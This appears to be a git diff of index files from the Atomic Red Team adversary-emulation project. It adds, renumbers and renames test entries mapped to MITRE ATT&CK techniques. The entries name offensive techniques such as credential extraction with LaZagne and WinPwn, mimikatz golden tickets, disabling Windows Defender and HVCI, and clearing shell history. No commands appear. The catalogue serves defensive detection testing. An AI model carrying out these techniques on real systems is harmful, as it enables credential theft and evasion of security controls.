defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
defense-evasion,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
@@ -98,6 +99,7 @@ persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
@@ -127,6 +129,7 @@ privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab
|
||||
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
|
||||
privilege-escalation,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
|
||||
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
|
||||
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
|
||||
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
|
||||
privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
|
||||
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
|
||||
@@ -162,9 +165,10 @@ credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Priva
|
||||
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
|
||||
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
|
||||
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
|
||||
credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
|
||||
credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
|
||||
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
|
||||
@@ -197,8 +201,8 @@ discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7f
|
||||
discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
|
||||
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
|
||||
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
|
||||
discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
|
||||
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
|
||||
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
|
||||
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
|
||||
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
|
||||
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
|
||||
command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
|
||||
@@ -224,6 +228,7 @@ execution,T1059.002,Command and Scripting Interpreter: AppleScript,1,AppleScript
|
||||
execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
|
||||
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
|
||||
|
||||
|
@@ -261,6 +261,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Lockbit Bl
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,38,Delete Windows Defender Scheduled Tasks,4b841aa1-0d05-4b32-bbe7-7564346e7c76,command_prompt
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,44,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
|
||||
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
|
||||
@@ -803,14 +804,14 @@ credential-access,T1110.003,Brute Force: Password Spraying,8,Password Spray usin
|
||||
credential-access,T1003.005,OS Credential Dumping: Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
|
||||
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
|
||||
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
|
||||
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
|
||||
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
|
||||
credential-access,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
|
||||
@@ -979,12 +980,12 @@ discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers
|
||||
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
|
||||
discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
|
||||
discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
|
||||
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
|
||||
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
|
||||
discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
|
||||
discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
|
||||
discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
|
||||
discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
|
||||
discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
|
||||
discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
|
||||
discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
|
||||
discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
|
||||
discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
|
||||
discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
|
||||
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
|
||||
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
|
||||
discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
|
||||
|
||||
|
@@ -3,7 +3,8 @@
|
||||
- [T1613 Container and Resource Discovery](../../T1613/T1613.md)
|
||||
- Atomic Test #1: Container and ResourceDiscovery [containers]
|
||||
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1046 Network Service Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1046 Network Service Discovery](../../T1046/T1046.md)
|
||||
- Atomic Test #9: Network Service Discovery for Containers [containers]
|
||||
|
||||
# credential-access
|
||||
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -70,7 +71,8 @@
|
||||
- Atomic Test #1: Deploy Docker container [containers]
|
||||
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1612 Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1612 Build Image on Host](../../T1612/T1612.md)
|
||||
- Atomic Test #1: Build Image On Host [containers]
|
||||
- T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -73,7 +73,7 @@
|
||||
- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1526 Cloud Service Discovery](../../T1526/T1526.md)
|
||||
- Atomic Test #1: Azure - Dump Subscription Data with MicroBurst [iaas:azure]
|
||||
- T1046 Network Service Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1046 Network Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
|
||||
@@ -330,6 +330,7 @@
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
|
||||
- Atomic Test #2: Activate Guest Account [windows]
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1085 Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
|
||||
@@ -397,7 +398,8 @@
|
||||
- T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1612 Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1612 Build Image on Host](../../T1612/T1612.md)
|
||||
- Atomic Test #1: Build Image On Host [containers]
|
||||
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -429,6 +431,11 @@
|
||||
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
|
||||
- Atomic Test #1: Disable history collection [linux, macos]
|
||||
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
|
||||
- Atomic Test #3: Clear bash history [linux]
|
||||
- Atomic Test #4: Setting the HISTCONTROL environment variable [linux]
|
||||
- Atomic Test #5: Setting the HISTFILESIZE environment variable [linux]
|
||||
- Atomic Test #6: Setting the HISTFILE environment variable [linux]
|
||||
- Atomic Test #7: Setting the HISTIGNORE environment variable [linux]
|
||||
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
|
||||
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
|
||||
@@ -503,6 +510,7 @@
|
||||
- Atomic Test #41: Reboot Linux Host via Kernel System Request [linux]
|
||||
- Atomic Test #42: Clear Pagging Cache [linux]
|
||||
- Atomic Test #43: Disable Memory Swap [linux]
|
||||
- Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
|
||||
- T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -816,6 +824,7 @@
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
|
||||
- Atomic Test #2: Activate Guest Account [windows]
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
|
||||
- Atomic Test #1: Create a new time provider [windows]
|
||||
- Atomic Test #2: Edit an existing time provider [windows]
|
||||
@@ -1303,6 +1312,7 @@
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
|
||||
- Atomic Test #2: Activate Guest Account [windows]
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
|
||||
- Atomic Test #1: Create a new time provider [windows]
|
||||
- Atomic Test #2: Edit an existing time provider [windows]
|
||||
@@ -1841,17 +1851,18 @@
|
||||
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
|
||||
- Atomic Test #1: Search Through Bash History [linux, macos]
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
|
||||
- Atomic Test #2: Extract passwords with grep [macos, linux]
|
||||
- Atomic Test #3: Extracting passwords with findstr [windows]
|
||||
- Atomic Test #4: Access unattend.xml [windows]
|
||||
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
|
||||
- Atomic Test #6: WinPwn - sensitivefiles [windows]
|
||||
- Atomic Test #7: WinPwn - Snaffler [windows]
|
||||
- Atomic Test #8: WinPwn - powershellsensitive [windows]
|
||||
- Atomic Test #9: WinPwn - passhunt [windows]
|
||||
- Atomic Test #10: WinPwn - SessionGopher [windows]
|
||||
- Atomic Test #11: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
|
||||
- Atomic Test #1: Find AWS credentials [macos, linux]
|
||||
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
|
||||
- Atomic Test #3: Extract passwords with grep [macos, linux]
|
||||
- Atomic Test #4: Extracting passwords with findstr [windows]
|
||||
- Atomic Test #5: Access unattend.xml [windows]
|
||||
- Atomic Test #6: Find and Access Github Credentials [macos, linux]
|
||||
- Atomic Test #7: WinPwn - sensitivefiles [windows]
|
||||
- Atomic Test #8: WinPwn - Snaffler [windows]
|
||||
- Atomic Test #9: WinPwn - powershellsensitive [windows]
|
||||
- Atomic Test #10: WinPwn - passhunt [windows]
|
||||
- Atomic Test #11: WinPwn - SessionGopher [windows]
|
||||
- Atomic Test #12: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
|
||||
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1528 Steal Application Access Token](../../T1528/T1528.md)
|
||||
- Atomic Test #1: Azure - Dump All Azure Key Vaults with Microburst [iaas:azure]
|
||||
@@ -2110,6 +2121,7 @@
|
||||
- Atomic Test #4: SharpHound3 - LocalAdmin [windows]
|
||||
- Atomic Test #5: Wmic Group Discovery [windows]
|
||||
- Atomic Test #6: WMIObject Group Discovery [windows]
|
||||
- Atomic Test #7: Permission Groups Discovery for Containers- Local Groups [containers]
|
||||
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
|
||||
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
|
||||
- Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
|
||||
@@ -2164,7 +2176,7 @@
|
||||
- Atomic Test #18: Get-DomainController with PowerView [windows]
|
||||
- Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
|
||||
- Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
|
||||
- [T1046 Network Service Scanning](../../T1046/T1046.md)
|
||||
- [T1046 Network Service Discovery](../../T1046/T1046.md)
|
||||
- Atomic Test #1: Port Scan [linux, macos]
|
||||
- Atomic Test #2: Port Scan Nmap [linux, macos]
|
||||
- Atomic Test #3: Port Scan NMap for Windows [windows]
|
||||
@@ -2173,6 +2185,7 @@
|
||||
- Atomic Test #6: WinPwn - MS17-10 [windows]
|
||||
- Atomic Test #7: WinPwn - bluekeep [windows]
|
||||
- Atomic Test #8: WinPwn - fruit [windows]
|
||||
- Atomic Test #9: Network Service Discovery for Containers [containers]
|
||||
- [T1518 Software Discovery](../../T1518/T1518.md)
|
||||
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
|
||||
- Atomic Test #2: Applications Installed [windows]
|
||||
@@ -2478,6 +2491,7 @@
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
|
||||
- Atomic Test #2: Activate Guest Account [windows]
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -117,6 +117,11 @@
|
||||
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
|
||||
- Atomic Test #1: Disable history collection [linux, macos]
|
||||
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
|
||||
- Atomic Test #3: Clear bash history [linux]
|
||||
- Atomic Test #4: Setting the HISTCONTROL environment variable [linux]
|
||||
- Atomic Test #5: Setting the HISTFILESIZE environment variable [linux]
|
||||
- Atomic Test #6: Setting the HISTFILE environment variable [linux]
|
||||
- Atomic Test #7: Setting the HISTIGNORE environment variable [linux]
|
||||
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
|
||||
@@ -433,8 +438,9 @@
|
||||
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
|
||||
- Atomic Test #1: Search Through Bash History [linux, macos]
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #2: Extract passwords with grep [macos, linux]
|
||||
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
|
||||
- Atomic Test #1: Find AWS credentials [macos, linux]
|
||||
- Atomic Test #3: Extract passwords with grep [macos, linux]
|
||||
- Atomic Test #6: Find and Access Github Credentials [macos, linux]
|
||||
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -525,7 +531,7 @@
|
||||
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
|
||||
- Atomic Test #13: Remote System Discovery - ip route [linux]
|
||||
- Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
|
||||
- [T1046 Network Service Scanning](../../T1046/T1046.md)
|
||||
- [T1046 Network Service Discovery](../../T1046/T1046.md)
|
||||
